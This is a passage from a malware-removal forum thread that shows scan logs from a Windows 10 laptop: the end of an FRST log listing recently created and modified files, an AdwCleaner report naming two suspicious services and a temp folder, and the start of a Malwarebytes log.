2016-05-10 16:50 - 2016-04-23 01:01 - 00217440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01776768 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01594920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01522152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01399224 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01372304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01337240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00550656 _____ (Microsoft Corporation) C:\WINDOWS\system32\directmanipulation.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00453472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directmanipulation.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 00058208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwminit.dll
2016-05-10 16:50 - 2016-04-23 00:56 - 00534872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-05-10 16:50 - 2016-04-23 00:39 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-05-10 16:50 - 2016-04-23 00:35 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-05-10 16:50 - 2016-04-23 00:34 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-05-10 16:50 - 2016-04-23 00:34 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\hmkd.dll
2016-05-10 16:50 - 2016-04-23 00:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-05-10 16:50 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmCx.sys
2016-05-10 16:50 - 2016-04-23 00:32 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-05-10 16:50 - 2016-04-23 00:32 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-05-10 16:50 - 2016-04-23 00:31 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-05-10 16:50 - 2016-04-23 00:30 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-05-10 16:50 - 2016-04-23 00:30 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00192000 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\filecrypt.sys
2016-05-10 16:50 - 2016-04-23 00:29 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-05-10 16:50 - 2016-04-23 00:29 - 00072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hmkd.dll
2016-05-10 16:50 - 2016-04-23 00:29 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ByteCodeGenerator.exe
2016-05-10 16:50 - 2016-04-23 00:29 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-05-10 16:50 - 2016-04-23 00:28 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2016-05-10 16:50 - 2016-04-23 00:27 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-05-10 16:50 - 2016-04-23 00:26 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-05-10 16:50 - 2016-04-23 00:26 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdbusenum.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00630784 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-05-10 16:50 - 2016-04-23 00:25 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00181248 _____ (Microsoft Corporation) C:\WINDOWS\system32\shacct.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SubscriptionMgr.dll
2016-05-10 16:50 - 2016-04-23 00:24 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\BrowserSettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:23 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2016-05-10 16:50 - 2016-04-23 00:21 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-05-10 16:50 - 2016-04-23 00:21 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 18676224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00307200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-05-10 16:50 - 2016-04-23 00:20 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shacct.dll
2016-05-10 16:50 - 2016-04-23 00:19 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BrowserSettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00988672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-05-10 16:50 - 2016-04-23 00:18 - 00804352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-05-10 16:50 - 2016-04-23 00:18 - 00515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-05-10 16:50 - 2016-04-23 00:18 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-05-10 16:50 - 2016-04-23 00:17 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-05-10 16:50 - 2016-04-23 00:16 - 01319424 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-05-10 16:50 - 2016-04-23 00:16 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 01073152 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00865792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-05-10 16:50 - 2016-04-23 00:15 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00647680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-05-10 16:50 - 2016-04-23 00:14 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-05-10 16:50 - 2016-04-23 00:13 - 00434688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2016-05-10 16:50 - 2016-04-23 00:12 - 00667648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-05-10 16:50 - 2016-04-23 00:10 - 00639488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-05-10 16:50 - 2016-04-23 00:09 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-05-10 16:50 - 2016-04-23 00:09 - 02582016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 02598912 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 01500160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-05-10 16:50 - 2016-04-23 00:07 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 05502976 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 02166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 02066432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-05-10 16:50 - 2016-04-23 00:05 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-05-10 16:50 - 2016-04-23 00:04 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-05-10 16:50 - 2016-04-23 00:04 - 01731072 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02280960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 02000896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-05-10 16:50 - 2016-04-23 00:03 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-05-10 16:50 - 2016-04-23 00:02 - 02444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-05-10 16:50 - 2016-04-23 00:01 - 04775424 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-05-10 16:50 - 2016-04-23 00:00 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-05-10 16:50 - 2016-04-23 00:00 - 00984576 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-05-10 16:50 - 2016-04-22 23:45 - 00461824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-05-10 16:50 - 2016-04-22 22:10 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshbth.dll
2016-05-10 16:49 - 2016-04-23 00:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ByteCodeGenerator.exe
2016-05-10 16:49 - 2016-04-23 00:32 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-05-10 16:49 - 2016-04-23 00:30 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-05-10 16:49 - 2016-04-23 00:29 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-05-10 16:49 - 2016-04-23 00:28 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-05-10 16:49 - 2016-04-23 00:28 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshbth.dll
2016-05-10 16:49 - 2016-04-23 00:27 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2016-05-10 16:49 - 2016-04-23 00:25 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-05-10 16:49 - 2016-04-23 00:24 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-05-10 16:49 - 2016-04-23 00:23 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-05-10 16:49 - 2016-04-23 00:22 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-05-10 16:49 - 2016-04-23 00:19 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlansec.dll
2016-05-10 16:49 - 2016-04-23 00:18 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-05-10 16:49 - 2016-04-23 00:18 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-05-10 16:49 - 2016-04-23 00:17 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanmsm.dll
2016-05-10 16:49 - 2016-04-22 22:10 - 00002186 _____ C:\WINDOWS\system32\AppxProvisioning.xml
2016-05-10 16:49 - 2016-04-18 18:30 - 00002186 _____ C:\WINDOWS\SysWOW64\AppxProvisioning.xml
2016-05-10 14:44 - 2016-05-10 14:44 - 00000000 _____ C:\autoexec.bat
2016-05-06 02:55 - 2016-05-06 02:55 - 00000319 _____ C:\Users\Jackie\Documents\tracfone acct number.txt

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-31 02:44 - 2016-03-13 18:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-31 02:08 - 2016-02-11 23:23 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-05-30 23:20 - 2015-09-23 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-05-30 23:19 - 2016-03-13 18:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-30 23:18 - 2015-09-15 18:51 - 00000000 __SHD C:\Users\Jackie\IntelGraphicsProfiles
2016-05-30 22:10 - 2015-10-30 02:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-05-30 22:08 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-05-30 22:07 - 2015-10-30 03:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-05-30 00:40 - 2015-03-28 11:45 - 00000000 ____D C:\Users\Jackie\AppData\Local\ElevatedDiagnostics
2016-05-26 21:39 - 2015-12-23 16:15 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-05-26 21:38 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-05-26 18:39 - 2016-03-31 12:21 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-05-26 16:33 - 2015-01-30 13:39 - 00000000 ____D C:\ProgramData\McAfee
2016-05-26 16:29 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-05-26 16:05 - 2015-01-30 14:03 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-05-25 23:54 - 2015-05-03 11:53 - 00000000 ___RD C:\Users\Jackie\OneDrive
2016-05-25 23:54 - 2015-03-28 12:04 - 00000000 ____D C:\Users\Jackie\AppData\Local\Adobe
2016-05-25 21:25 - 2015-10-30 03:24 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-05-25 18:49 - 2015-01-29 16:36 - 00000000 ____D C:\Users\Jackie\AppData\Local\CrashDumps
2016-05-25 18:27 - 2015-10-30 03:21 - 00000000 ____D C:\WINDOWS\INF
2016-05-25 18:08 - 2014-10-27 10:40 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-05-25 16:38 - 2016-02-16 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mahjong Duels
2016-05-25 16:38 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files\Windows Defender
2016-05-25 16:38 - 2015-02-03 00:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-05-25 16:38 - 2014-10-27 10:59 - 00000000 ____D C:\ProgramData\Norton
2016-05-25 16:38 - 2014-10-27 10:47 - 00000000 ____D C:\ProgramData\Package Cache
2016-05-25 16:38 - 2014-04-14 07:45 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-05-25 16:37 - 2016-01-26 14:48 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Paltalk Messenger
2016-05-25 16:37 - 2015-10-30 03:24 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-05-25 16:37 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-05-25 16:37 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\servicing
2016-05-25 16:37 - 2015-09-28 19:57 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MahjongChamp
2016-05-25 16:21 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\registration
2016-05-24 21:52 - 2015-02-01 19:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-05-24 21:40 - 2015-02-01 19:11 - 139319312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-05-24 15:22 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-05-24 15:21 - 2016-04-22 16:15 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-05-24 15:21 - 2016-02-16 19:32 - 00001107 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mahjong Duels.lnk
2016-05-24 15:21 - 2016-02-10 17:37 - 00002366 _____ C:\Users\Jackie\Desktop\Kindle.lnk
2016-05-24 15:21 - 2015-12-23 16:07 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-05-24 15:21 - 2015-09-15 19:21 - 00002419 _____ C:\Users\Jackie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-05-24 15:21 - 2014-04-14 08:10 - 00002220 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk
2016-05-24 15:21 - 2014-04-14 07:44 - 00002067 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba Registration.lnk
2016-05-24 15:21 - 2014-04-14 07:40 - 00001074 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TOSHIBA Start.lnk
2016-05-24 15:21 - 2014-04-14 07:38 - 00001995 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-05-22 18:06 - 2015-12-23 15:56 - 00000000 ____D C:\Users\Jackie
2016-05-21 11:42 - 2015-07-10 05:05 - 00000000 ____D C:\Users\Default.migrated
2016-05-19 11:35 - 2016-04-22 16:14 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-05-19 11:29 - 2015-10-30 03:24 - 00000000 __RSD C:\WINDOWS\Media
2016-05-19 00:12 - 2015-11-02 04:23 - 00000000 ____D C:\WINDOWS\System32\Tasks\Component System
2016-05-18 21:41 - 2015-10-26 10:59 - 00000000 ____D C:\Users\Jackie\AppData\LocalLow\Adblock Plus for IE
2016-05-14 11:15 - 2015-10-30 03:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-05-14 05:26 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\rescache
2016-05-13 11:23 - 2015-01-29 12:25 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-05-13 06:39 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\Provisioning
2016-05-13 06:38 - 2015-10-30 05:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-05-13 06:38 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-05-13 06:37 - 2015-10-30 03:24 - 00015703 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2016-05-12 13:16 - 2015-01-29 13:40 - 00000000 ____D C:\Users\Jackie\AppData\Local\Packages
2016-05-11 15:57 - 2015-10-30 03:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-05-11 15:57 - 2015-10-30 03:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-05-10 19:39 - 2016-03-13 18:34 - 00003980 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-05-10 19:39 - 2016-03-13 18:34 - 00003748 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-05-10 14:45 - 2016-02-11 13:47 - 22440784 _____ ( ) C:\Users\Jackie\Downloads\ymahj-setup.exe
2016-05-10 14:00 - 2015-05-23 22:18 - 00124928 ___SH C:\Users\Jackie\Downloads\Thumbs.db
2016-05-10 02:09 - 2015-03-17 00:35 - 00000000 ____D C:\ProgramData\Skype
2016-05-08 00:34 - 2016-02-11 13:48 - 00000000 ____D C:\Users\Jackie\AppData\Local\Mahjong Duels
2016-05-06 13:03 - 2015-03-17 00:36 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Skype
2016-05-02 21:52 - 2014-04-14 07:40 - 00000000 ____D C:\Program Files\TOSHIBA
2016-05-02 21:50 - 2015-01-29 13:42 - 00000000 ____D C:\Users\Jackie\AppData\Local\TOSHIBA

==================== Files in the root of some directories =======

2016-05-24 01:54 - 2016-05-24 01:54 - 6859776 _____ () C:\Users\Jackie\AppData\Roaming\agent.dat
2016-05-24 01:52 - 2016-05-24 01:52 - 0127488 _____ () C:\Users\Jackie\AppData\Roaming\Installer.dat
2016-05-19 10:45 - 2016-05-19 11:11 - 0000115 _____ () C:\Users\Jackie\AppData\Roaming\LogFile.txt
2016-05-24 01:54 - 2016-05-24 01:54 - 0018432 _____ () C:\Users\Jackie\AppData\Roaming\Main.dat
2016-05-24 01:53 - 2016-05-24 01:53 - 0076565 _____ () C:\Users\Jackie\AppData\Roaming\Mat-La.bin
2016-05-24 19:49 - 2016-05-24 19:58 - 0000464 _____ () C:\Users\Jackie\AppData\Local\infection.log
2015-12-23 15:51 - 2015-12-23 15:51 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\Jackie\AppData\Local\Temp\0023321464194555mcinst.exe
C:\Users\Jackie\AppData\Local\Temp\McCSPInstall.dll
C:\Users\Jackie\AppData\Local\Temp\mccspuninstall.exe
C:\Users\Jackie\AppData\Local\Temp\msvcr120.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-05-28 16:21

==================== End of FRST.txt ============================
 
#11 ·
Here is the AdwCleaner log file:

# AdwCleaner v5.119 - Logfile created 31/05/2016 at 03:31:43
# Updated 30/05/2016 by Xplode
# Database : 2016-05-30.3 [Server]
# Operating system : Windows 10 Home (X64)
# Username : Jackie - LAPTOP2
# Running from : C:\Users\Jackie\Downloads\adwcleaner_5.119.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****

Service Found : Scheduler
Service Found : 13114cc54a946f641c081c84a88f491d

***** [ Folders ] *****

Folder Found : C:\Users\Jackie\AppData\Local\Temp\MPC

***** [ Files ] *****

***** [ DLL ] *****
 
#12 ·
Here is the first of two MBAM logs:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/12/2016
Scan Time: 11:04 PM
Logfile: malbytes 1.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.13.01
Rootkit Database: v2016.03.12.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
